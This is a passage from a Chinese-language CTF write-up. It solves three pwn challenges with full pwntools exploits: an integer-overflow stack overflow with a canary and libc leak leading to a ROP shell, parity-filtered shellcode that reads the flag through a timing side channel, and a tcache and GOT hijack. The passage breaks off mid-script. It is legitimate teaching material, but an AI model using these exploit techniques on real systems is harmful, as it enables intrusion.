<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">convert_to_signed</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="keyword">return</span> (-<span class="number">1</span>)*(<span class="number">0xffffffff</span>-num)-<span class="number">1</span></span><br></pre></td></tr></tbody></table></figure>

<p>至此，我们总结一下能够利用的漏洞：</p>
<p>可以利用整数溢出在栈上写非常长的内容，因此可以利用栈溢出劫持程序控制流。</p>
<p>但是由于保护全开且没有win函数，因此我们需要先leak canary，然后leak libc，最后在栈上布局 ROP chain 来 get shell。</p>
<p>我们先在<code>sub_170e</code>函数（读取用户输入的函数）处下一个断点，观察栈的布局。</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b4963cbd53.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b4963cbd53.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="stack"></p>
<p>发现canary距离用户输入的起始位置为0x108字节，因此我们需要覆盖用户输入的前0x109字节为非0字符，然后调用show就可以连带canary一起输出出来。而读取用户输入的<code>sub_170e</code>函数是一个带0截断的函数：当我们输入<code>\n</code>会被替换成<code>\x00</code>，如果长度参数正好等于我们输入的长度，就不会添0。因此我们需要让其长度参数恰好等于0x109，也就是在调用<code>edit</code>时，输入的长度为<code>convert_to_signed(0x109)</code>。然后输入0x109个<code>A</code>，再调用show，最后7位就是canary的高7位。</p>
<p>用户输入的起始位置加上0x118个字节是libc的地址，与基地址的偏移是0x29d90，使用和leak canary几乎一样的方法可以leak libc。</p>
<p>最后就是在栈上布局 rop chain 了。因为有libc，因此可以直接用libc的gadgets，使用pwntools构造一个execve(‘/bin/sh’,0,0)的Rop，在栈上canary的位置填入canary，返回地址处布局rop chain，即可得到shell。</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">rop = ROP(libc)</span><br><span class="line">rop.execve(<span class="built_in">next</span>(libc.search(<span class="string">b'/bin/sh\x00'</span>)), <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">payload = <span class="string">b'A'</span> * <span class="number">0x108</span> + p64(canary) + <span class="string">b'B'</span> * <span class="number">0x8</span> + rop.chain()</span><br><span class="line">edit(convert_to_signed(<span class="built_in">len</span>(payload)), payload)</span><br></pre></td></tr></tbody></table></figure>

<p>完整exp：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = context.binary = ELF(<span class="string">'./memo1'</span>)</span><br><span class="line">libc = binary.libc</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(binary.path)</span></span><br><span class="line">p = remote(<span class="string">'111.186.57.85'</span>, <span class="number">40311</span>)</span><br><span class="line"></span><br><span class="line">password = <span class="string">b'CTF_is_interesting_isn0t_it?'</span></span><br><span class="line">p.recvuntil(<span class="string">b'Please enter your password: '</span>)</span><br><span class="line">p.sendline(password)</span><br><span class="line"><span class="comment"># then it is a overflow</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">payload</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">b'Your choice:'</span>, <span class="string">b'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">b'What do you want to write in the memo:'</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>():</span><br><span class="line">    p.sendlineafter(<span class="string">b'Your choice:'</span>, <span class="string">b'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'Content:\n'</span>)</span><br><span class="line">    <span class="keyword">return</span> p.recvline()[:-<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">length, payload</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">b'Your choice:'</span>, <span class="string">b'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">b'How many characters do you want to change:'</span>, <span class="built_in">str</span>(length).encode())</span><br><span class="line">    p.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_flag</span>():</span><br><span class="line">    p.sendlineafter(<span class="string">b'Your choice:'</span>, <span class="string">b'114514'</span>)</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># beause there is a jle instruction, so we can use negative number to bypass it</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">convert_to_signed</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="keyword">return</span> (-<span class="number">1</span>)*(<span class="number">0xffffffff</span>-num)-<span class="number">1</span></span><br><span class="line"></span><br><span class="line">main_offset = <span class="number">0x1938</span></span><br><span class="line">libc_offset = <span class="number">0x29d90</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### first leak canary</span></span><br><span class="line">add(<span class="string">b'A'</span> * <span class="number">0x8</span>)</span><br><span class="line">edit(convert_to_signed(<span class="number">0x109</span>), <span class="string">b'A'</span>*<span class="number">0x109</span>)</span><br><span class="line">response = show()</span><br><span class="line">canary = response[<span class="number">0x109</span>:<span class="number">0x109</span>+<span class="number">7</span>].rjust(<span class="number">8</span>, <span class="string">b'\x00'</span>)</span><br><span class="line">canary = u64(canary)</span><br><span class="line">info(<span class="string">f'[LEAK]: canary: <span class="subst">{<span class="built_in">hex</span>(canary)}</span>'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">### leak libc address</span></span><br><span class="line">payload = <span class="string">b'A'</span> * <span class="number">0x118</span></span><br><span class="line">edit(convert_to_signed(<span class="built_in">len</span>(payload)), payload)</span><br><span class="line">response = show()</span><br><span class="line">libc_leak = response[<span class="number">0x118</span>:<span class="number">0x118</span>+<span class="number">6</span>].ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>)</span><br><span class="line">libc_leak = u64(libc_leak)</span><br><span class="line">info(<span class="string">f'[LEAK]: libc_leak: <span class="subst">{<span class="built_in">hex</span>(libc_leak)}</span>'</span>)</span><br><span class="line">libc.address = libc_leak - libc_offset</span><br><span class="line">info(<span class="string">f'[LEAK &amp; CALC]: libc_base: <span class="subst">{<span class="built_in">hex</span>(libc.address)}</span>'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">### leak pie address</span></span><br><span class="line"><span class="comment"># payload = b'A' * 0x128</span></span><br><span class="line"><span class="comment"># edit(convert_to_signed(len(payload)), payload)</span></span><br><span class="line"><span class="comment"># response = show()</span></span><br><span class="line"><span class="comment"># main_addr = response[0x128:0x128+6].ljust(8, b'\x00')</span></span><br><span class="line"><span class="comment"># main_addr = u64(main_addr)</span></span><br><span class="line"><span class="comment"># elf.address = main_addr - main_offset</span></span><br><span class="line"><span class="comment"># info(f'[LEAK &amp; CALC]: pie_base: {hex(elf.address)}')</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p, '''</span></span><br><span class="line"><span class="comment"># ''')</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### no win_func now, wo we use rop</span></span><br><span class="line">rop = ROP(libc)</span><br><span class="line">rop.execve(<span class="built_in">next</span>(libc.search(<span class="string">b'/bin/sh\x00'</span>)), <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">payload = <span class="string">b'A'</span> * <span class="number">0x108</span> + p64(canary) + <span class="string">b'B'</span> * <span class="number">0x8</span> + rop.chain()</span><br><span class="line">edit(convert_to_signed(<span class="built_in">len</span>(payload)), payload)</span><br><span class="line"></span><br><span class="line">get_flag()</span><br></pre></td></tr></tbody></table></figure>

<p>flag: </p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0ops{5t4ck_0v3rfl0w_1s_d4ng3r0u5_233}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="Shellcode"><a href="#Shellcode" class="headerlink" title="Shellcode"></a>Shellcode</h3><p>本题的考察点正如题名是shellcode，但是seccomp只允许了open和read，没有write，因此需要利用循环来实现类似侧信道攻击。另外，对shellcode的字节做了限制：</p>
<ol>
<li><p>偶数索引处的字节必须是偶数，奇数索引处的字节必须是奇数</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v5; ++i )</span><br><span class="line">{</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">char</span>)(*((<span class="type">char</span> *)buf + i) % <span class="number">2</span>) != i % <span class="number">2</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0xFFFFFFFF</span>LL;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
</li>
<li><p>大于0x80的奇数不能用</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">mov     rax, [rbp+buf]</span><br><span class="line">add     rax, rdx</span><br><span class="line">movzx   eax, byte ptr [rax]</span><br><span class="line">mov     edx, eax</span><br><span class="line">sar     dl, 7</span><br><span class="line">shr     dl, 7</span><br><span class="line">add     eax, edx</span><br><span class="line">and     eax, 1</span><br><span class="line">sub     eax, edx</span><br><span class="line">movsx   ecx, al</span><br></pre></td></tr></tbody></table></figure>

<p>这段实际上是将shellcode的字节作为一字节的有符号数来对2取模，因此类似于0x81这样的大于0x80的奇数模2后的结果是-1而不是1，但是对索引的取模是看作无符号数，因此奇数索引处取模是1而不等于-1。这也就代表着大于0x80的奇数不能出现在shellcode中，这点非常坑。。。比前一点限制花了我更多时间。因为这个限制相当于把一般的jmp长跳转、call、ret、syscall全都禁止掉了。</p>
<p>思路：</p>
<p>由于我们还要进行侧信道攻击，不可能每爆破一个字节都构造一个能满足要求的shellcode，因此考虑分两个阶段：</p>
<ul>
<li>阶段1：调用read函数，rdi设置一阶段shellcode的起始位置，并将返回地址设置为这个起始地址</li>
<li>阶段2：输入二阶段进行侧信道攻击的shellcode，read将返回到我们输入的这个shellcode</li>
</ul>
<p>每个二阶段shellcode爆破一个字节：将[flag_addr+i]与每个可见字符作比较，相等时进入死循环，通过对时间的测量就能知道flag的每个字节是哪个字符值。</p>
<p>开凑：</p>
<p>先凑一阶段的shellcode。由于限制非常多，因此考虑尽量利用栈上已有的内容和寄存器中已有的内容（pop和push某个寄存器都是一字节的指令，不同寄存器奇偶性质不同，很容易满足限制的要求）。</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b4982d0c82.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b4982d0c82.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="stack"></p>
<p><img src="https://bu.dusays.com/2024/04/26/662b498f4cbe9.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b498f4cbe9.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="stack"></p>
<p>rsp的最顶端是返回地址即<code>main+0xc4</code>，我们将这个地址pop到rax，然后对rax进行xor操作，可以得到read@plt，方便后续调用read库函数。有了这个思路，我们就需要布置好read的参数。rdi现在恰好是0，符合我们的要求，不去修改。rsi也是输入的起始地址不需要修改。rdx需要修改为我们想要输入的长度，经过观察rsp+0x8处的低8位正好是我们一阶段输入的长度，因此我们只需要将rsp+0x8的低8位值放到rdx中去即可：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">pop rax</span><br><span class="line">pop rbx</span><br><span class="line">nop</span><br><span class="line">xor edx, ebx</span><br><span class="line">pop rbx</span><br><span class="line">xor ax, 0x03e6</span><br><span class="line">xor ax, 0x100</span><br><span class="line">sub al, 1</span><br></pre></td></tr></tbody></table></figure>

<p>这样就已经将read@plt放到了rax里面，并布置好了rdi, rsi 和 rdx。接下来的问题就是如何调用rax中存储的函数。已知jmp的长跳转、call、ret、syscall都不符合这道题的过滤要求。怎么办？想起之前用ROPgadget的时候看到ret{num}这种形式的指令，去搜了一下，发现是ret之后，令rsp增加num字节。字节码是：<code>b'\xc2\x01\x00'</code>正好满足要求。但是又出现一个新的问题：</p>
<p>栈指针增长奇数个字节后，我们就无法控制返回地址了。</p>
<p>因此想到，如果在ret {num}之前先让栈增长或者减少奇数字节，而且这个命令能够通过过滤，就能解决这个问题。搜索发现有一个enter指令：</p>
<p><code>enter</code>指令的完整格式是:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">enter bytes, level</span><br></pre></td></tr></tbody></table></figure>

<p>其中:</p>
<ol>
<li><code>bytes</code>是一个立即数,表示当前函数需要在栈上分配的空间大小(以字节为单位)。这个值通常就是函数内局部变量所需的大小。</li>
<li><code>level</code>是另一个立即数,表示嵌套函数调用的层数。通常这个值为 0。</li>
</ol>
<p>我这里用一个<code>enter 0x1, 0x3</code>，level是我随便指定的，在gdb里面看效果：</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b49a1ded5e.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b49a1ded5e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="before_enter"></p>
<p><img src="https://bu.dusays.com/2024/04/26/662b49af0971c.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b49af0971c.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="after_enter"><br>栈指针减少了0x21字节，那么我们再用ret 9就可以让栈重新和8字节对齐，在那之前先把read@plt的地址push入栈，ret的时候才能返回到read，等后面栈指针增加和8字节对齐的时候可以返回到我们在enter之前push入栈的shellcode地址。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">nop</span><br><span class="line">push rbx</span><br><span class="line">push rax</span><br><span class="line">push rbx</span><br><span class="line">push rax</span><br><span class="line">push rbx</span><br><span class="line">enter 0x1, 0x3</span><br><span class="line">nop</span><br><span class="line">pop rbx</span><br><span class="line">push rax</span><br><span class="line">push rbx</span><br><span class="line">nop</span><br><span class="line">pop rbx</span><br><span class="line">ret 0x0009</span><br><span class="line">pop rbx</span><br></pre></td></tr></tbody></table></figure>

<p>至此第一阶段就构造完成了，第二阶段的shellcode就是open(‘flag’, 0)然后read第i个索引处的字节，与各个可见字符进行比较，如果相等就死循环，通过时间判断是否命中，逐字节爆破到<code>}</code>为止，完整exp如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># no write for us</span></span><br><span class="line"><span class="comment"># defeat seccomp reference: https://tttang.com/archive/1447/#toc_wirte</span></span><br><span class="line"><span class="comment"># by pass shellcode check reference: </span></span><br><span class="line"><span class="comment"># - https://www.roderickchan.cn/zh-cn/2022-04-30-angstromctf-pwn/</span></span><br><span class="line"><span class="comment"># - https://ctftime.org/writeup/33656</span></span><br><span class="line"><span class="comment"># - https://hackmd.io/@DJRcJnpzRDK3J_8-dhv_dA/rycDEyFSq#parity</span></span><br><span class="line"><span class="comment"># - https://www.aynakeya.com/ctf-writeup/2022/angstrom/pwn/parity/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = context.binary = ELF(<span class="string">'./shellcode'</span>)</span><br><span class="line"><span class="comment"># context.log_level = 'critical'</span></span><br><span class="line"></span><br><span class="line">shellcode1_part1 = asm(<span class="string">'''</span></span><br><span class="line"><span class="string">    pop rax</span></span><br><span class="line"><span class="string">    pop rbx</span></span><br><span class="line"><span class="string">    nop</span></span><br><span class="line"><span class="string">    xor edx, ebx</span></span><br><span class="line"><span class="string">    pop rbx</span></span><br><span class="line"><span class="string">    xor ax, 0x03e6</span></span><br><span class="line"><span class="string">    xor ax, 0x100</span></span><br><span class="line"><span class="string">    sub al, 1</span></span><br><span class="line"><span class="string">    nop</span></span><br><span class="line"><span class="string">    push rbx</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">    push rbx</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">'''</span>)</span><br><span class="line"></span><br><span class="line">shellcode1_part2 = asm(<span class="string">'''</span></span><br><span class="line"><span class="string">    push rbx</span></span><br><span class="line"><span class="string">    enter 0x1, 0x3</span></span><br><span class="line"><span class="string">    nop</span></span><br><span class="line"><span class="string">    pop rbx</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">    push rbx</span></span><br><span class="line"><span class="string">    nop</span></span><br><span class="line"><span class="string">    pop rbx</span></span><br><span class="line"><span class="string">    ret 0x0009</span></span><br><span class="line"><span class="string">    pop rbx</span></span><br><span class="line"><span class="string">'''</span>)</span><br><span class="line"></span><br><span class="line">shellcode1 = shellcode1_part1 + shellcode1_part2</span><br><span class="line">lenth = <span class="built_in">len</span>(shellcode1)</span><br><span class="line">padding_times = <span class="built_in">int</span>((<span class="number">0x200</span> - lenth) / <span class="number">2</span>)</span><br><span class="line">padding = <span class="string">b'\x90\x61'</span> * padding_times</span><br><span class="line">shellcode1 = shellcode1 + padding</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i, c <span class="keyword">in</span> <span class="built_in">enumerate</span>(shellcode1):</span><br><span class="line">    <span class="comment"># if c &gt;= 0b10000000:</span></span><br><span class="line">    <span class="comment">#     log.info("bad byte %s at index %d" % (hex(c), i))</span></span><br><span class="line">    <span class="comment">#     log.error(shellcode1)</span></span><br><span class="line">    <span class="keyword">if</span> i &amp; <span class="number">1</span> != c &amp; <span class="number">1</span>:</span><br><span class="line">        log.info(<span class="string">"bad byte %s at index %d"</span> % (<span class="built_in">hex</span>(c), i))</span><br><span class="line">        log.error(shellcode1)</span><br><span class="line">    <span class="keyword">if</span> c &amp; <span class="number">1</span> == <span class="number">1</span> <span class="keyword">and</span> c &gt; <span class="number">0x80</span>:</span><br><span class="line">        log.info(<span class="string">"negative byte %s at index %d"</span> % (<span class="built_in">hex</span>(c), i))</span><br><span class="line">        log.error(shellcode1)</span><br><span class="line"></span><br><span class="line"><span class="comment"># we need brute force every byte of flag</span></span><br><span class="line"><span class="comment"># the seach space is 0x20 ~ 0x7e</span></span><br><span class="line">search_space = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x20</span>, <span class="number">0x7e</span>)]</span><br><span class="line"></span><br><span class="line">flag_probable_len = <span class="number">0x40</span></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_probable_len):</span><br><span class="line">    <span class="keyword">for</span> ch <span class="keyword">in</span> search_space:</span><br><span class="line">        <span class="comment"># p = process(binary.path)</span></span><br><span class="line">        p = remote(<span class="string">'111.186.57.85'</span>,<span class="number">40245</span>)</span><br><span class="line">        p.recvuntil(<span class="string">b'Please input your shellcode: \n'</span>)</span><br><span class="line">        <span class="comment">### stage1: call a read syscall to read shellcode</span></span><br><span class="line">        p.send(shellcode1)</span><br><span class="line">        <span class="comment">### stage2: fuck yeah! we can send shellcode without limitation now</span></span><br><span class="line">        <span class="comment"># but we have no write</span></span><br><span class="line">        <span class="comment"># so we have to use ways like side channel</span></span><br><span class="line">        shellcode2 = asm(<span class="string">f'''</span></span><br><span class="line"><span class="string">        lea rdi, [rip+flag]</span></span><br><span class="line"><span class="string">        mov rsi, 0</span></span><br><span class="line"><span class="string">        mov rax, 2</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        mov rdi, rax</span></span><br><span class="line"><span class="string">        mov rsi, rsp</span></span><br><span class="line"><span class="string">        mov rdx, 0x100</span></span><br><span class="line"><span class="string">        mov rax, 0</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        loop:</span></span><br><span class="line"><span class="string">        xor rax, rax</span></span><br><span class="line"><span class="string">        xor rbx, rbx</span></span><br><span class="line"><span class="string">        mov al, byte ptr[rsp+<span class="subst">{i}</span>]</span></span><br><span class="line"><span class="string">        mov bl, <span class="subst">{ch}</span></span></span><br><span class="line"><span class="string">        cmp al, bl</span></span><br><span class="line"><span class="string">        je loop</span></span><br><span class="line"><span class="string">        flag:</span></span><br><span class="line"><span class="string">            .string "./flag"</span></span><br><span class="line"><span class="string">        '''</span>)</span><br><span class="line">        shellcode2 += <span class="string">b'\x90'</span> * (<span class="number">0x200</span> - <span class="built_in">len</span>(shellcode2))</span><br><span class="line">        p.send(shellcode2)</span><br><span class="line">        <span class="comment"># learned from changcheng cup...</span></span><br><span class="line">        p.shutdown(<span class="string">'send'</span>)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># now if ch is the right byte, the program will be in a dead loop</span></span><br><span class="line">        <span class="comment"># otherwise the program will die</span></span><br><span class="line">        sleep(<span class="number">1</span>)</span><br><span class="line">        <span class="comment"># if p.poll() == None:</span></span><br><span class="line">        <span class="comment">#     flag += chr(ch)</span></span><br><span class="line">        <span class="comment">#     print("flag is now: ", flag)</span></span><br><span class="line">        <span class="comment">#     p.close()</span></span><br><span class="line">        <span class="comment">#     break</span></span><br><span class="line">        <span class="comment"># else:</span></span><br><span class="line">        <span class="comment">#     p.close()</span></span><br><span class="line">        <span class="comment">#     continue</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            detection = p.fileno()</span><br><span class="line">            p.recv(timeout=<span class="number">0.1</span>)</span><br><span class="line">            flag += <span class="built_in">chr</span>(ch)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">"flag is now: "</span>, flag)</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> flag[:-<span class="number">1</span>] == <span class="string">'}'</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></tbody></table></figure>

<p>flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0ops{practice_handwrite_shellcode}</span><br></pre></td></tr></tbody></table></figure></li>
</ol>
<h3 id="flat"><a href="#flat" class="headerlink" title="flat"></a>flat</h3><p>本题的考察点是deflat去混淆和tcache劫持。</p>
<p>其实题目对deflat的提示很明显，但是我一开始没往这方面向，直到出flag才知道要用deflat，一开始是自己手动去混淆的：</p>
<p>先看明白了每种操作对应一个opcode，然后找<code>==</code>，然后根据<code>i=xxxxx</code>去找case<code>xxxxx</code>，有if的就猜测可能是对什么进行判断（比如索引、size），然后选一个i去找case……最后硬是把程序的主要逻辑逆向出来了：</p>
<ul>
<li><p>48879: 退出程序</p>
</li>
<li><p>4112：堆块写，但是最后一位由程序置零（edit_0_end）</p>
<p>e.g. edit_0_end(index, payload)</p>
<p>会对index所对应位置的size和address做非空检查，且0&lt;=index&lt;31，payload的长度实际上最多比size少1，最后一字节会被置0</p>
</li>
<li><p>768: malloc</p>
<p>e.g. malloc(index, size, payload)</p>
<p>会对index所对应位置的size和address做非空检查，且0&lt;=index&lt;31，payload的长度实际上最多比size少1，最后一字节会被置0</p>
</li>
<li><p>2989: 堆块写（edit）</p>
<p>e.g. edit(index, payload)</p>
<p>会对index所对应位置的size和address做非空检查，且0&lt;=index&lt;31，payload的长度恰好等于size</p>
</li>
<li><p>4919: free</p>
<p>e.g.free(index)</p>
<p>会检查0&lt;=inex&lt;31，检查address处是否已经为空，然后将对应address和size都置零。</p>
</li>
<li><p>57005: 堆块读（puts）</p>
<p>会对index所对应位置的size和address做非空检查，且0&lt;=index&lt;31，然后puts堆块内容</p>
</li>
</ul>
<p>但是这里的0截断并没有off-by-null漏洞，在how2heap找了半天找不到利用方法。于是在gdb里先试着：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = context.binary = ELF(<span class="string">'./flat'</span>)</span><br><span class="line">libc = binary.libc</span><br><span class="line"></span><br><span class="line">p = binary.process()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">malloc</span>(<span class="params">index, size, data</span>):</span><br><span class="line">    p.sendline(<span class="string">b'768'</span>) </span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    p.sendline(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">index</span>):</span><br><span class="line">    p.sendline(<span class="string">b'4919'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">index, data</span>):</span><br><span class="line">    p.sendline(<span class="string">b'2989'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.send(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit_0_end</span>(<span class="params">index, data</span>):</span><br><span class="line">    p.sendline(<span class="string">b'4112'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.sendline(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">puts</span>(<span class="params">index</span>):</span><br><span class="line">    p.sendline(<span class="string">b'57005'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    <span class="keyword">return</span> p.recvline().strip()</span><br><span class="line"></span><br><span class="line">malloc(<span class="number">0</span>,<span class="number">0x100</span>, <span class="string">b'a'</span>)</span><br><span class="line">edit(<span class="number">0</span>, cyclic(<span class="number">0x100</span>))</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">malloc(<span class="number">1</span>,<span class="number">0x100</span>, <span class="string">b'b'</span>)</span><br><span class="line">edit(<span class="number">1</span>, cyclic(<span class="number">0x100</span>))</span><br></pre></td></tr></tbody></table></figure>

<p>发现mallo个两次0x100大小的堆块程序就退出了，于是在第一次后面把gdb附上去：</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b49ca08bb4.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b49ca08bb4.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="PoC"></p>
<p>十分离谱……我到现在也没弄明白这个漏洞是哪里来的。</p>
<p>换成0x80及以下似乎就没这种情况,0x90的时候链表有两个值，分别是我们输入的0x80处和0x88处，也就是说我们在0x80和0x88处写上合法的地址，下一次malloc相应大小的chunk就能控制我们输入的地址。</p>
<p>checksec一下：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x3fe000)</span><br><span class="line">RUNPATH:  b'.'</span><br></pre></td></tr></tbody></table></figure>

<p>那么我们现在需要做的就很清晰：</p>
<ol>
<li>leak libc</li>
<li>got hijacking</li>
<li>get shell</li>
</ol>
<p>首先，准备好用于leak和劫持的堆块，以及写有<code>/bin/sh</code>的堆块；然后malloc一个可用大小为0x90的堆块，malloc一个可用大小为0x330（实际大小为0x340）的堆块并free掉，使得tcache的0x340大小链表有一项。然后往0x90大小的堆块里面填满<code>heap_manager</code>地址（也就是该程序用来管理堆块的区域起始地址）。这样当我们再malloc一个可用大小为0x330到0x338大小的堆块时，就会返回<code>heap_manager</code>的地址。我们往这里面填入0x1000和free_got的地址，这样程序自定义的堆管理器就会认为index0处之前malloc了一个可用大小为0x1000的堆块，且位于free_got。因此我们这时再<code>puts(0)</code>就不会报错，也就能够leak出libc中free的地址，也就知道了libc的基地址。然后利用这个基地址知道system的地址，往0写入这个地址，也就将free劫持到system。最后我们<code>free(1)</code>，1是我们之前放<code>/bin/sh</code>的地方，此时执行<code>system('/bin/sh')</code>，得到shell。</p>
<p>完整exp：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = context.binary = ELF(<span class="string">'./flat'</span>)</span><br><span class="line">libc = binary.libc</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = binary.process()</span></span><br><span class="line">p = remote(<span class="string">'111.186.57.85'</span>, <span class="number">40246</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">malloc</span>(<span class="params">index, size, data</span>):</span><br><span class="line">    p.sendline(<span class="string">b'768'</span>) </span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    p.sendline(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">index</span>):</span><br><span class="line">    p.sendline(<span class="string">b'4919'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">index, data</span>):</span><br><span class="line">    p.sendline(<span class="string">b'2989'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.send(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit_0_end</span>(<span class="params">index, data</span>):</span><br><span class="line">    p.sendline(<span 